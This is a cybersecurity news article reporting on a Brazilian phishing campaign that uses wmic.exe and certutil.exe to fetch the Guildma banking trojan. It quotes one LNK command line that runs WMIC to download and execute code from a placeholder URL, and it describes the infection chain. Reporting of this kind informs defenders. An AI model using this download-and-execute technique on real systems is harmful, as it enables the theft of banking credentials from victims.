New Malware Abusing Two Legitimate Windows Files to Steal Victims Personal Data

Researchers discovered a new malware that abusing two legitimate windows files and use it against compromised victims to steal sensitive information.

One file wmic.exe is a command line utility and the other file certutil.exe is a program that manages certificates for Windows.

These files are used for download the payload on the infected windows machine and also other files that later used for malicious purpose.

Attackers using more evasion techniques in this campaign and both files are already used by other malware but current attack integrate both files.

Researchers believe that the cybercriminals behind the malware attack using powerful tools and techniques to perform more stealthy operations.

How Does this Malware Abusing Legitimate Windows files

The initial stage of infection starts from the malicious email campaign that targeting users along with urgency notification content of postal service of Brazil to trick users to click the links inside of the email that posed as users missed the postal delivery attempt.

Attacker trick user to click the embedded link by saying that they can find the more details by clicking the link.

Once the victims click the link and the new windows pop-up that attempts to download a malicious Zip file.

According to Trend Micro report,Once the zip file is downloaded and extracted, the user will be presented with an LNK file (detected as Trojan.LNK.DLOADR.AUSUJM). The LNK file will then point to cmd.exe using the following parameter:
/k start /MIN %WINDIR$\\system32\\wbem\\WMIC.exe os get /format {URL} && exit
The cmd.exe is responsible for executing wmic.exe via the following parameter:
os get /format {URL}

After the execution of cmd.exe attempt to download and execute the command from its command & control server.

It drops the copy of the Windows Files certutil.exe in the %temp% folder in a different name and the next process involved to make an attempt to communicate with the new C&C server to download a new set of files.

Here comes the main payload which detected as TSPY_GUILDMA.C by Trend Micro and the researchers believes that the payload shows that it is a banking malware that only works when the target’s language is set to Portuguese.

Finally, the Payload will be executed on victims machine using regsvr32.exe to steal banking information such as transaction details and login credentials.

Also Read:

New Adwind RAT Attack Linux, Windows and Mac via DDE Code Injection Technique by Evading Antivirus Software

Java Usage Tracker Critical Flaw Enable Hackers to Inject Arbitrary Files on Windows Systems

Balaji

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Recent Posts

Zero-Trust Policy Bypass Enables Exploitation of Vulnerabilities and Manipulation of NHI Secrets

A new project has exposed a critical attack vector that exploits protocol vulnerabilities to disrupt…

2 days ago

Threat Actor Sells Burger King Backup System RCE Vulnerability for $4,000

A threat actor known as #LongNight has reportedly put up for sale remote code execution…

2 days ago

Chinese Nexus Hackers Exploit Ivanti Endpoint Manager Mobile Vulnerability

Ivanti disclosed two critical vulnerabilities, identified as CVE-2025-4427 and CVE-2025-4428, affecting Ivanti Endpoint Manager Mobile…

2 days ago

Hackers Target macOS Users with Fake Ledger Apps to Deploy Malware

Hackers are increasingly targeting macOS users with malicious clones of Ledger Live, the popular application…

2 days ago

EU Targets Stark Industries in Cyberattack Sanctions Crackdown

The European Union has escalated its response to Russia’s ongoing campaign of hybrid threats, announcing…

2 days ago

Venice.ai’s Unrestricted Access Sparks Concerns Over AI-Driven Cyber Threats

Venice.ai has rapidly emerged as a disruptive force in the AI landscape, positioning itself as…

2 days ago